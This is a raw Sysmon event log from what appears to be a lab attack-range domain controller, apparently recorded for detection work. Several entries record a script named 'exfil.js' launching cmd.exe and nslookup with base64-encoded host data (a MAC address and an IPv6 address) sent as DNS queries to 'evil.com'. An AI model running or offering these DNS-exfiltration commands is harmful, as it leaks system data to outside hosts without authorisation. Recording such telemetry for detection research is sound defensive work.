14:16:17.849{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E33E-000000005F02}2316C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.828{2E1864BB-17B1-629A-E33E-000000005F02}23168020C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-E23E-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.813{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E33E-000000005F02}2316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E23E-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-17A1-629A-783D-000000005F02}55522692C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-E23E-000000005F02}7484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.802{2E1864BB-17B1-629A-E23E-000000005F02}7484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltkd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.796{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiltn.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-17B1-629A-E03E-000000005F02}42805332C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-E13E-000000005F02}5816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E13E-000000005F02}5816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.765{2E1864BB-17B1-629A-DF3E-000000005F02}47407468C:\Windows\system32\cmd.exe{2E1864BB-17B1-629A-E13E-000000005F02}5816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.768{2E1864BB-17B1-629A-E13E-000000005F02}5816C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B1-629A-DF3E-000000005F02}4740C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiltn.tmp 2>&1 10341000x8000000000000000196746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.713{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E03E-000000005F02}4280C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.713{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B1-629A-E03E-000000005F02}4280C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.698{2E1864BB-17B1-629A-E03E-000000005F02}42805332C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-DF3E-000000005F02}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.681{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-E03E-000000005F02}4280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B1-629A-DF3E-000000005F02}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-17A1-629A-783D-000000005F02}55522736C:\Windows\System32\WScript.exe{2E1864BB-17B1-629A-DF3E-000000005F02}4740C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.670{2E1864BB-17B1-629A-DF3E-000000005F02}4740C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiltn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.665{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbvsc.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:17.596{2E1864BB-17B1-629A-DD3E-000000005F02}37764768C:\Windows\system32\conhost.exe{2E1864BB-17B1-629A-DE3E-000000005F02}3724C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000196733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.176{00000000-0000-0000-0000-000000000000}6508evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 